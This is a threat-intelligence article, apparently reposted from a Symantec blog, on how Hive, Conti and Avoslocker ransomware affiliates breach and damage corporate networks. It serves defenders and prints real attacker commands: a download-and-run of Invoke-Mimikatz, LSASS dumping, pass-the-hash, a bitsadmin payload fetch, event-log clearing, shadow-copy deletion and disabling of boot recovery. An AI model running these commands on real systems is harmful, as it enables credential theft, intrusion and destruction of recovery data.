Ransomware: How Attackers are Breaching Corporate Networks

0

Targeted ransomware attacks continue to be one of the most critical cyber risks facing organizations of all sizes. The tactics used by ransomware attackers are continually evolving, but by identifying the most frequently employed tools, tactics, and procedures (TTPs) organizations can gain a deeper understanding of how ransomware groups infiltrate networks and use this knowledge to identify and prioritize areas of weakness.


Symantec, a division of Broadcom Software, tracks various ransomware threats; however, the following three ransomware families are being observed in the majority of recent attacks:

  • Hive
  • Conti
  • Avoslocker

Similar to many other ransomware families, Hive, Conti, and Avoslocker follow the ransomware-as-a-service (RaaS) business model. In the RaaS model, the ransomware operators hire affiliates who are responsible for launching the ransomware attacks on their behalf. In most cases, affiliates stick to a playbook that contains detailed attack steps laid out by the ransomware operators.

Once initial access to a victim network has been gained, Hive, Conti, and Avoslocker use a plethora of TTPs to help the operators achieve the following:

  • Gain persistence on the network
  • Escalate privileges
  • Tamper with and evade security software
  • Laterally move across the network

Initial Access

Affiliates for the Hive, Conti, and Avoslocker ransomware operators use a variety of techniques to gain an initial foothold on victim networks. Some of these techniques include:

  • Spear phishing leading to the deployment of malware, including but not limited to:
    • IcedID
    • Emotet
    • QakBot
    • TrickBot
  • Taking advantage of weak RDP credentials
  • Exploiting vulnerabilities such as:
    • Microsoft Exchange vulnerabilities – CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, CVE-2021-26855
    • FortiGate firewall vulnerabilities – CVE-2018-13379 and CVE-2018-13374
    • Apache Log4j vulnerabily – CVE-2021-44228

In most cases, the spear-phishing emails contain Microsoft Word document attachments embedded with macros that lead to the installation of one of the previously mentioned malware threats. In some instances, attackers use this malware to install Cobalt Strike, which is then used to pivot to other systems on the network. These malware threats are then used to distribute ransomware onto compromised computers.

Also Read: Ransomware Attack: Incident Response Plan and Action Items

Persistence

After gaining initial access, Symantec has observed affiliates for all three ransomware families using third-party software such as AnyDesk and ConnectWise Control (previously known as ScreenConnect) to maintain access to victim networks. They also enable default Remote Desktop access in the firewall:

netsh advfirewall firewall set rule group="Remote Desktop" new enable=yes

Actors are also known to create additional users on compromised systems to maintain access. In some instances we have seen threat actors add registry entries that allow them to automatically log in when a machine is restarted:

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d <user> /f

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 1 /f

Discovery

During the discovery phase, the ransomware actors try to sweep the victim’s network to identify potential targets. Symantec has observed the aforementioned ransomware actors using tools such as the following:

  • ADRecon – Gathers Active Directory information and generates a report
  • Netscan – Discovers devices on the network

Credential Access

Mimikatz is a go-to tool for most ransomware groups and Hive, Conti, and Avoslocker are no exception. We have observed them using the PowerShell version of Mimikatz as well as the PE version of the tool. There are also instances where the threat actors directly load the PowerShell version of Mimikatz from GitHub repositories:

powershell IEX((new-object net.webclient).downloadstring('https://raw.githubusercontent.com/<redacted>/Invoke-Mimikatz.ps1'));Invoke-Mimikatz -DumpCreds

In addition to using Mimikatz, the threat actors have also taken advantage of the native rundll32 and comsvcs.dll combination to dump the LSASS memory:

rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <process id> lsass.dmp full

Adversaries also dump the SECURITY, SYSTEM, and SAM hives and later extract credentials from the dump. On rare occasions, they have also been observed using taskmgr.exe to dump the LSASS memory and later using the dump to extract valuable credentials.

Lateral Movement

Attackers employ tools like PsExec, WMI, and BITSAdmin to laterally spread and execute the ransomware on victim networks. We have also observed the attackers using several other techniques to laterally move across networks.

  • PsExec

psexec -accepteula @ips.txt -s -d -c CSIDL_WINDOWS\xxx.exe

  • WMI

wmic /node:@C:\share$\comps1.txt /user:"user" /password:"password" process call create "cmd.exe /c bitsadmin /transfer xxx \\IP\share$\xxx.exe %APPDATA%\xxx.exe&%APPDATA%\xxx.exe"

  • BITSAdmin

bitsadmin /transfer debjob /download /priority normal hxxp://<IP>/ele.dll CSIDL_WINDOWS\ele.dll

  • Mimikatz

mimikatz.exe "privilege::debug" "sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm hash>"

Also Read: Advanced Hunting to Find the Ransomware

Defense Evasion

As with a number of other ransomware families, Hive, Conti, and Avoslocker also tamper with various security products that interfere with their goal. We have observed them meddling with security services using the net, taskkill, and sccommands to disable or terminate them. In some cases they also use tools like PC Hunterto end processes. They have also been seen tampering with various registry entries related to security products, since changes to the registry entries can make those products inoperative.

Disabling the default Windows firewall is also one of the techniques we have seen being used by these ransomware families:

netsh advfirewall set allprofiles state off

To cover their tracks on a victim system the actors may also clear the Windows event log:

wevtutil.exe cl system

wevtutil.exe cl security

wevtutil.exe cl application

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

Impact

Adversaries tend to disable or tamper with operating system settings in order to make it difficult for administrators to recover data. Deleting shadow copies is a common tactic threat actors perform before starting the encryption process. They perform this task by using tools like Vssadmin or WMIC and running one of the following commands:

vssadmin.exe delete shadows /all /quiet

wmic.exe shadowcopy delete

Symantec have also seen BCDEditbeing used to disable automatic system recovery and to ignore failures on boot:

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

bcdedit.exe /set {default} recoveryenabled no

In some instances the actors delete the safe mode settings in the registry to stop security product services from starting in safe mode:

reg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\<service> /f

Exfiltration

Attackers commonly exfiltrate critical data from a victim’s environment before encrypting it. They then use the stolen data in an attempt to extort a ransom from victims. We have observed threat actors using the following cloud services to exfiltrate data:

  • https://anonfiles.com
  • https://mega.nz
  • https://send.exploit.in
  • https://ufile.io
  • https://www.sendspace.com

We have also seen attackers use the following tools for data exfiltration:

  • Filezilla
  • Rclone

Also Read: Latest IOCs – Threat Actor URLs , IP’s & Malware Hashes

Conclusion

The TTPs used by these threat actors are constantly evolving, with groups continually tweaking their methods in a bid to outmaneuver their targets’ security defenses. As such, organizations need to be vigilant and employ a multi-layered security approach.

Source/Credits: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker


LEAVE A REPLY

Please enter your comment!
Please enter your name here